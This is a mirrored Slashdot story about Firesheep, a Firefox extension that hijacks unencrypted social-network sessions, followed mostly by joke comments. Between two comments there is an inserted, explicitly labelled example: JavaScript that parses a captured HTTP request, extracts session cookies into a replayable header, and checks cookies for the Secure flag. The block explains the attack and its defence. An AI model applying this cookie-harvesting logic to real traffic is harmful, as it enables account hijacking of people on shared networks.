Slashdot Mirror


Firefox Extension Makes Social-Network ID Spoofing Trivial

Orome1 writes "A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has hit the security world with the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point. 'When it comes to user privacy, SSL is the elephant in the room,' said Eric Butler, the developer of the extension in question, dubbed Firesheep. By installing and running it, anyone can 'sniff out' the unencrypted HTTP sessions currently allowing users on that network segment to access social networks, online services and other websites requiring a login, and simply hijack them and impersonate the user."


  1. First haxx! by Anonymous Coward · · Score: 4, Funny

    Ha ha, anon is pwned :D

    1. Re:First haxx! by Anonymous Coward · · Score: 5, Funny

      WTF! This guy is logged in as me!

    2. Re:First haxx! by Anonymous Coward · · Score: 1, Funny

      Dude, seriously, he probably isn't even using the plugin... Your password is one of the worst I've seen. Heck, even I cracked it (as you can see from this post)

    3. Re:First haxx! by Anonymous Coward · · Score: 2, Funny

      Remind me to change the combination to my luggage.

  2. Re:Why no encryption? by betterunixthanunix · · Score: 4, Funny

    Facebook's servers are too busy violating your privacy to handle the extra load of encryption ;)

    --
    Palm trees and 8
  3. My comments by formfeed · · Score: 2, Funny

    I'd like to declare that all comments under my user name that are controversial or could get me in trouble were made by someone else.

    Someone, who obviously must have sniffed out my wireless cookies. -Shame on them.

  4. Re:Use md5 (or something) over the wire by Culture20 · · Score: 4, Funny

    md5 is a hash algorithm. How would that help? If someone can snoop your md5 hash they can replay it to gain access to the server, and then change your password (provided the server doesn't provide a challenge to perform this action). All md5 does is protect your actual password, which is small protection if your account can be illicitly accessed anyway. None of these services send a password in plaintext (hopefully). That isn't the issue. The issue is that they use replayable tokens and don't use encryption to send them on the wire.

    Well, then md5 the hash. It's just like using triple-DES or double rot-13 (one of the two, or maybe a happy middle-ground). ;)

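The replayable-token problem Culture20 describes above, as an added example that is not part of the thread or of Firesheep's own code: a Firesheep-style handler table, a parser for a plaintext HTTP request as it would be captured off an open wireless network, extraction of the session cookie(s) into a header that can simply be re-sent, and the check a site owner would want (is the cookie marked Secure, so the browser never sends it over plain HTTP). The site names, cookie names and the captured request are constructed for the demo, not Firesheep's real handler list or real traffic.

```javascript
// Added example (not Firesheep's code): why a cleartext session cookie is a
// replayable credential, and what a site has to change to stop the sniffing.
//
// A Firesheep-style "handler" knows, per site, which cookie(s) carry the
// session. The site names and cookie names below are assumptions for the
// demo, not Firesheep's real handler list.
const HANDLERS = {
  "www.example-social.test": { sessionCookies: ["sid"] },
  "mail.example-webmail.test": { sessionCookies: ["auth", "uid"] },
};

// Parse one captured HTTP/1.1 request (text form). Returns null if the
// bytes don't look like an HTTP request (e.g. they are TLS ciphertext).
function parseHttpRequest(raw) {
  const headerEnd = raw.indexOf("\r\n\r\n");
  if (headerEnd === -1) return null;
  const lines = raw.slice(0, headerEnd).split("\r\n");
  const m = /^([A-Z]+) (\S+) HTTP\/1\.[01]$/.exec(lines[0]);
  if (!m) return null;
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i === -1) continue;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method: m[1], path: m[2], headers };
}

// Split a Cookie request header into a name -> value map.
function parseCookieHeader(value) {
  const cookies = {};
  for (const part of (value || "").split(";")) {
    const i = part.indexOf("=");
    if (i === -1) continue;
    cookies[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return cookies;
}

// What the extension does per captured request: if the Host matches a
// handler and all of that handler's session cookies are present, the
// capture is a usable identity. No password is ever involved.
function hijackFromCapture(raw) {
  const req = parseHttpRequest(raw);
  if (!req) return null;
  const handler = HANDLERS[req.headers.host];
  if (!handler) return null;
  const cookies = parseCookieHeader(req.headers.cookie);
  const session = {};
  for (const name of handler.sessionCookies) {
    if (!(name in cookies)) return null;
    session[name] = cookies[name];
  }
  // The "hijack" is nothing more than re-sending these same values.
  const replayHeader = Object.entries(session)
    .map(([k, v]) => `${k}=${v}`)
    .join("; ");
  return { host: req.headers.host, session, replayHeader };
}

// The server-side fix: a cookie marked Secure is never sent over plain
// HTTP, so there is nothing to sniff. Returns true if a Set-Cookie header
// lacks that attribute (i.e. the cookie will leak on port 80).
function cookieIsSniffable(setCookieHeader) {
  const attrs = setCookieHeader
    .split(";")
    .slice(1)
    .map((a) => a.trim().toLowerCase());
  return !attrs.includes("secure");
}

// Constructed sample capture (not real traffic): one request as it would
// leave a browser over port 80 on an open wireless network.
const CAPTURED_REQUEST =
  "GET /home HTTP/1.1\r\n" +
  "Host: www.example-social.test\r\n" +
  "User-Agent: Mozilla/5.0\r\n" +
  "Cookie: locale=en; sid=9f86d081884c7d65; theme=dark\r\n" +
  "\r\n";

console.log(hijackFromCapture(CAPTURED_REQUEST));
// { host: 'www.example-social.test', session: { sid: '9f86d081884c7d65' },
//   replayHeader: 'sid=9f86d081884c7d65' }
console.log(cookieIsSniffable("sid=9f86d081884c7d65; Path=/; HttpOnly")); // true
```

Hashing the password client-side, as the md5 subthread suggests, changes nothing here: the value being replayed is the session cookie the server handed out after login, and the server accepts it from whoever presents it. The only changes that close the hole are serving the logged-in session over TLS and setting the cookie with the Secure attribute so the browser refuses to send it in the clear.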
  5. Re:Why no encryption? by cerberusss · · Score: 4, Funny

    Facebook's servers are too busy violating your privacy to handle the extra load of encryption ;)

    Facebook's servers were hanging around in a dark alley one fateful night. My privacy just happened to think that particular night, let's take the shorter route home. It's as if Facebook's servers sniffed she was coming, despite her high privacy settings. They libpcaptured her, then stripped all of her headers and checksums, right down to her bare profile, while taunting her loudly. Some traffic just passed by without doing anything. My privacy was violated again and again, and Facebook's servers just kept going and going. Then they left my privacy "face"-down in a shallow ditch, some shreds of unique ROWIDs covering her bloodsoaked profile.

    --
    8 of 13 people found this answer helpful. Did you?
  6. Re:Use md5 (or something) over the wire by PatPending · · Score: 2, Funny

    md5 the password with Javascript on the client end before sending it. Then un-md5 it with PHP on the server.

    Or use quad-ROT13 instead.

    --
    What one fool can do, another can. (Ancient Simian Proverb)
  7. Re:Illegal? by Romberg · · Score: 3, Funny

    yeah, like I'm gonna click on your link.....

  8. Re:Use md5 (or something) over the wire by nomorecwrd · · Score: 2, Funny

    Better yet, 1024-ROT13... it's a little time consuming, but totally worth it.